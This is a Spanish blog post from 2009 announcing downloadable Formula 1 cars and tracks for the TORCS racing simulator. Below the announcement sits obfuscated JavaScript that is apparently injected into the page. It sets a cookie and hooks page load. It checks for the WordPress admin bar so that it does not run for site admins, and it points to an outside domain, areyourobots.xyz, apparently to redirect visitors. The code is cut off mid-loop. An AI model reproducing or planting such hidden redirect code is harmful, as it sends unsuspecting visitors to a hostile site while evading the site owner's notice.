

Primeros recursos en descarga para For1-Torcs

Escrito por apr-torcs

Jueves, 23 de Julio de 2009 16:47 - Actualizado Domingo, 09 de Agosto de 2009 16:16

Primer articulo para comunicar que ya hay recursos en descarga para For1-Torcs (asi es como llamo a mi proyecto de ir implementando coches, circuitos...) de Formula 1 en Torcs.

En total hay disponibles 9 coches, empezando por el apr09 y siguiendo con algunos clones de los coches de formula 1 de esta temporada. Por otro lado tambien encontraréis las pistas de formula 1 que van disputadas hasta ahora (lo llamo pistas porque solo son eso, no esperéis encontrar gradas y edificios del entorno del circuito. Eso es otro paso en el desarrollo).

Son 11 pistas, que ire subiendo cundo las vaya concluyendo mínimamente, hasta el gp de valencia que fue el primero que hice. La pista del gp de hungria esta solo iniciada y espero concluirla en los próximos días.

```
var
_0x2cf4=['MSIE;', 'OPR', 'Chromium', 'Chrome', 'ppkcookie', 'location', 'https://www.areyourobots.xy
z', 'onload', 'getElementById', 'undefined', 'setTime', 'getTime', 'toUTCString', 'cookie', ';x20path=/', 'spl
it', 'length', 'charAt', 'substring', 'indexOf', 'match', 'userAgent', 'Edge'];(function(_0x15c1df, _0x14d88
2){var
_0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_
0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var
_0x287a=function(_0x1c2503, _0x26453f){_0x1c2503=_0x1c2503-0x0;var
_0x58feb3=_0x2cf4[_0x1c2503];return
_0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadmi
nbar')===null){if(typeof _0x335357===_0x287a('0x2')){function
_0x335357(_0xe0ae90, _0x112012, _0x5523d4){var _0x21e546=";if(_0x5523d4){var
_0x5b6c5c=new
Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x
3e8);_0x21e546=';x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0
ae90+''+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var
_0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var
_0x51e64c=0x0;_0x51e64c
```